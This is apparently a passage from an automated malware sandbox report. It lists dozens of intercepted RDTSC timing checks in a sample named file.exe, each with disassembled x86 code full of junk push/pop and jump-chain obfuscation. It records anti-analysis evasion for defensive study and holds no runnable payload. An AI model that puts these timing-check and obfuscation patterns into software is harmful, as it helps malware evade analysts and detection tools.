Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 90DB17 second address: 90DB1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 90DB1B second address: 90DB2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 90DB2A second address: 90DB3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DA9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 90DB3B second address: 90DB45 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FFBC91A3BDCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 90DB45 second address: 791B46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007FFBC8B2DA9Fh 0x0000000f mov eax, dword ptr [eax] 0x00000011 jmp 00007FFBC8B2DAA6h 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a jo 00007FFBC8B2DAA3h 0x00000020 jmp 00007FFBC8B2DA9Dh 0x00000025 pop eax 0x00000026 jmp 00007FFBC8B2DA9Ah 0x0000002b push dword ptr [ebp+122D0595h] 0x00000031 mov dword ptr [ebp+122D30BCh], ecx 0x00000037 call dword ptr [ebp+122D1DD7h] 0x0000003d pushad 0x0000003e mov dword ptr [ebp+122D189Fh], edi 0x00000044 xor eax, eax 0x00000046 jmp 00007FFBC8B2DAA0h 0x0000004b mov edx, dword ptr [esp+28h] 0x0000004f mov dword ptr [ebp+122D189Fh], esi 0x00000055 mov dword ptr [ebp+122D39AAh], eax 0x0000005b jmp 00007FFBC8B2DA9Ch 0x00000060 jmp 00007FFBC8B2DAA7h 0x00000065 mov esi, 0000003Ch 0x0000006a jmp 00007FFBC8B2DAA9h 0x0000006f add esi, dword ptr [esp+24h] 0x00000073 jmp 00007FFBC8B2DAA6h 0x00000078 clc 0x00000079 lodsw 0x0000007b stc 0x0000007c add eax, dword ptr [esp+24h] 0x00000080 clc 0x00000081 mov ebx, dword ptr [esp+24h] 0x00000085 sub dword ptr [ebp+122D189Fh], edx 0x0000008b nop 0x0000008c push esi 0x0000008d push eax 0x0000008e push edx 0x0000008f pushad 0x00000090 popad 0x00000091 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DBE7 second address: 90DC3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC91A3BDDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007FFBC91A3BE7h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jp 00007FFBC91A3BE0h 0x0000001a mov eax, dword ptr [eax] 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FFBC91A3BE3h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DC3C second address: 90DC65 instructions: 0x00000000 rdtsc 0x00000002 js 00007FFBC8B2DA98h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 jmp 00007FFBC8B2DAA5h 0x00000016 pop ecx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DC65 second address: 90DD08 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 and edi, dword ptr [ebp+122D37CEh] 0x0000000f add esi, dword ptr [ebp+122D3746h] 0x00000015 push 00000003h 0x00000017 mov edx, dword ptr [ebp+122D3826h] 0x0000001d push 00000000h 0x0000001f jmp 00007FFBC91A3BE6h 0x00000024 push 00000003h 0x00000026 mov edx, dword ptr [ebp+122D3A66h] 0x0000002c push 9506531Fh 0x00000031 je 00007FFBC91A3BEDh 0x00000037 push esi 0x00000038 jmp 00007FFBC91A3BE5h 0x0000003d pop esi 0x0000003e add dword ptr [esp], 2AF9ACE1h 0x00000045 mov edi, 0E020BDAh 0x0000004a lea ebx, dword ptr [ebp+1244FA57h] 0x00000050 push 00000000h 0x00000052 push ecx 0x00000053 call 00007FFBC91A3BD8h 0x00000058 pop ecx 0x00000059 mov dword ptr [esp+04h], ecx 0x0000005d add dword ptr [esp+04h], 0000001Dh 0x00000065 inc ecx 0x00000066 push ecx 0x00000067 ret 0x00000068 pop ecx 0x00000069 ret 0x0000006a mov edi, dword ptr [ebp+122D1F7Eh] 0x00000070 push eax 0x00000071 push eax 0x00000072 push edx 0x00000073 push eax 0x00000074 push edx 0x00000075 push eax 0x00000076 push edx 0x00000077 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DD08 second address: 90DD0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DD0C second address: 90DD16 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FFBC91A3BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DD16 second address: 90DD31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFBC8B2DAA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DDDA second address: 90DDDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DDDE second address: 90DE0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jl 00007FFBC8B2DA98h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FFBC8B2DA9Bh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DE0F second address: 90DE24 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007FFBC91A3BD8h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DE24 second address: 90DE47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DE47 second address: 90DE58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DE58 second address: 90DE5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DE5C second address: 90DEDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC91A3BDEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007FFBC91A3BDCh 0x0000000f jnp 00007FFBC91A3BD6h 0x00000015 popad 0x00000016 pop eax 0x00000017 jmp 00007FFBC91A3BDBh 0x0000001c push 00000003h 0x0000001e mov edx, dword ptr [ebp+122D3956h] 0x00000024 mov di, si 0x00000027 push 00000000h 0x00000029 mov dword ptr [ebp+122D36A2h], edi 0x0000002f push 00000003h 0x00000031 call 00007FFBC91A3BE1h 0x00000036 je 00007FFBC91A3BEFh 0x0000003c jmp 00007FFBC91A3BE9h 0x00000041 pop edx 0x00000042 push 8F5C633Eh 0x00000047 push eax 0x00000048 push edx 0x00000049 push ebx 0x0000004a je 00007FFBC91A3BD6h 0x00000050 pop ebx 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DEDC second address: 90DEF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFBC8B2DAA9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DEF9 second address: 90DF2D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FFBC91A3BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 4F5C633Eh 0x00000013 lea ebx, dword ptr [ebp+1244FA60h] 0x00000019 mov cl, ah 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FFBC91A3BE6h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DFB2 second address: 90DFC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFBC8B2DAA2h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DFC8 second address: 90DFCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DFCC second address: 90DFF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b pushad 0x0000000c push ebx 0x0000000d clc 0x0000000e pop edi 0x0000000f mov dword ptr [ebp+122D2499h], ebx 0x00000015 popad 0x00000016 push 00000000h 0x00000018 sub edi, dword ptr [ebp+122D1FE8h] 0x0000001e push 4B40D591h 0x00000023 pushad 0x00000024 jl 00007FFBC8B2DA9Ch 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DFF8 second address: 90E06A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jo 00007FFBC91A3BD6h 0x0000000b jns 00007FFBC91A3BD6h 0x00000011 popad 0x00000012 popad 0x00000013 xor dword ptr [esp], 4B40D511h 0x0000001a sbb edx, 3EFCA9F4h 0x00000020 push 00000003h 0x00000022 mov dword ptr [ebp+122D24A8h], esi 0x00000028 push 00000000h 0x0000002a jmp 00007FFBC91A3BE4h 0x0000002f push 00000003h 0x00000031 push 00000000h 0x00000033 push ebx 0x00000034 call 00007FFBC91A3BD8h 0x00000039 pop ebx 0x0000003a mov dword ptr [esp+04h], ebx 0x0000003e add dword ptr [esp+04h], 00000018h 0x00000046 inc ebx 0x00000047 push ebx 0x00000048 ret 0x00000049 pop ebx 0x0000004a ret 0x0000004b xor cl, FFFFFFFAh 0x0000004e push E06D08B2h 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 ja 00007FFBC91A3BD6h 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90E06A second address: 90E087 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E5BA second address: 92E5BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E5BF second address: 92E5C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E5C7 second address: 92E5CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 902198 second address: 90219C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90219C second address: 9021A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92C4C9 second address: 92C4D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92C4D1 second address: 92C4D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92C4D5 second address: 92C4DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92CF1D second address: 92CF36 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFBC91A3BDBh 0x0000000d ja 00007FFBC91A3BD6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D0A7 second address: 92D0AC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D0AC second address: 92D0BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jng 00007FFBC91A3BDEh 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D213 second address: 92D236 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FFBC8B2DAA8h 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D236 second address: 92D23A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D23A second address: 92D25A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FFBC8B2DAA4h 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D25A second address: 92D25E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D3B0 second address: 92D3F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FFBC8B2DAA2h 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007FFBC8B2DAA6h 0x00000011 ja 00007FFBC8B2DA96h 0x00000017 jo 00007FFBC8B2DA96h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D3F0 second address: 92D3F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D6B0 second address: 92D6DB instructions: 0x00000000 rdtsc 0x00000002 jc 00007FFBC8B2DA96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FFBC8B2DAA0h 0x00000010 jne 00007FFBC8B2DA96h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 popad 0x0000001a pushad 0x0000001b push ecx 0x0000001c push edi 0x0000001d pop edi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92DDEF second address: 92DDF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92DDF4 second address: 92DE17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFBC8B2DAA9h 0x00000009 jno 00007FFBC8B2DA96h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92DE17 second address: 92DE22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92DF40 second address: 92DF6F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007FFBC8B2DAA9h 0x0000000e pop ecx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 pop eax 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92DF6F second address: 92DF7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC91A3BDCh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E123 second address: 92E12D instructions: 0x00000000 rdtsc 0x00000002 jp 00007FFBC8B2DA96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E12D second address: 92E13B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FFBC91A3BD6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E13B second address: 92E14D instructions: 0x00000000 rdtsc 0x00000002 jno 00007FFBC8B2DA96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007FFBC8B2DAA2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E14D second address: 92E15F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FFBC91A3BD6h 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FFBC91A3BD6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9314AC second address: 9314E2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FFBC8B2DAAFh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FFBC8B2DA9Ch 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 903CDC second address: 903CE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 933E94 second address: 933EA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FFBC8B2DA9Eh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F9CD6 second address: 8F9CF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFBC91A3BE9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93B348 second address: 93B366 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA6h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93B366 second address: 93B36A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93B4C3 second address: 93B4C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93B4C8 second address: 93B4D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FFBC91A3BD6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93B4D4 second address: 93B4D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93B8E1 second address: 93B8F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFBC91A3BDDh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93B8F5 second address: 93B8FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93BACC second address: 93BAD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93BAD2 second address: 93BAD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93BAD6 second address: 93BADA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93BADA second address: 93BB12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FFBC8B2DAA8h 0x0000000b jmp 00007FFBC8B2DAA3h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93BB12 second address: 93BB16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93BB16 second address: 93BB22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93BB22 second address: 93BB26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93BB26 second address: 93BB2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93BC74 second address: 93BC78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93C5EA second address: 93C5EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93C764 second address: 93C76D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93D65F second address: 93D666 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93D666 second address: 93D670 instructions: 0x00000000 rdtsc 0x00000002 js 00007FFBC91A3BDCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93D71F second address: 93D73E instructions: 0x00000000 rdtsc 0x00000002 jng 00007FFBC8B2DA96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jnp 00007FFBC8B2DA9Ch 0x00000013 mov dword ptr [ebp+122D32D9h], edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push edx 0x0000001e pop edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93D73E second address: 93D742 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93DC5C second address: 93DC62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E58F second address: 93E593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E593 second address: 93E597 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E4A1 second address: 93E4AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E597 second address: 93E59D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E59D second address: 93E5A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
